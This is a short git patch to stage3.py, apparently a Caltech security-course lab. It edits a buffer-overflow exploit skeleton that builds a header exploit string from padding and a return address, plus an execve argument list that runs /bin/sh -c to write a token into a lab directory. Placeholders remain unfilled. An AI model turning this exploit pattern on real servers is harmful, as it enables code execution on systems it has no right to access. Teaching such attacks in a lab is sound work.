From abdb8d890a039c44c99a43770de3fb7f248e66bc Mon Sep 17 00:00:00 2001
From: Adam Blank <blank@caltech.edu>
Date: Mon, 19 Oct 2020 12:21:16 -0700
Subject: [PATCH] Update stage3.py

---
 stage3.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/stage3.py b/stage3.py
index 9ceee3c..87bf1d5 100644
--- a/stage3.py
+++ b/stage3.py
@@ -22,7 +22,10 @@ ADDRESS = to_bytes(0xdeadbeef)
 
 USER = b"FILL ME IN"
 PASSWORD = b"FILL ME IN"
-SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00", b"\x00"]
+
+# These are the arguments that make up the shell script we want to execve.
+# Don't forget that there needs to be a NULL pointer as the last argument in addition to these!
+SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00"]
 
 # The "exploit string" is what we send in as the headers
 HEADERS = PADDING + ADDRESS
-- 
GitLab